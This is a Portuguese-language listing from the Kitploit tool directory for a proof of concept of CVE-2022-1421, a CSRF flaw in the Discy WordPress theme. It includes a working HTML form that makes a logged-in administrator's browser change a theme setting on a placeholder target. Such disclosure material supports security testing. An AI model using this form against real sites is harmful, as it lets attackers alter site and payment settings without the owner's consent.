Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-1421 — Exploit de prova de conceito para CVE-2022-1421, uma vulnerabilidade CSRF no tema Discy WordPress que permite modificação das configurações de administrador através de requisições AJAX maliciosas. | Kitploit
Ferramentas/GitHubGitHub/nb1b3k/cve-2022-1421
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnb1b3k/cve-2022-1421

CVE-2022-1421

Exploit de prova de conceito para CVE-2022-1421, uma vulnerabilidade CSRF no tema Discy WordPress que permite modificação das configurações de administrador através de requisições AJAX maliciosas.

Ver Repositório
73há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-1421

Uma Prova de Conceito para CVE-2022-1421

Discy < 5.2 - Atualização de Configurações via CSRF

Discy < 5.2 não tem verificações CSRF em algumas ações AJAX, permitindo que um atacante faça um administrador logado alterar configurações arbitrárias do plugin, incluindo métodos de pagamento, através de um ataque CSRF.

Tema Afetado

Discy < 5.2

POC

root@kitploit:~
<html>
  <body>
    <form action="https://target.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="discy_update_options">
      <input type="hidden" name="data" value="discy_options[footer_copyright]=You%20are%20ultra-PWNED">
      <input type="submit" value="Submit request">
    </form>
  </body>
</html> 

Referências

https://wpscan.com/vulnerability/a7a24e8e-9056-4967-bcad-b96cc0c5b249

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1421

Baixar ferramenta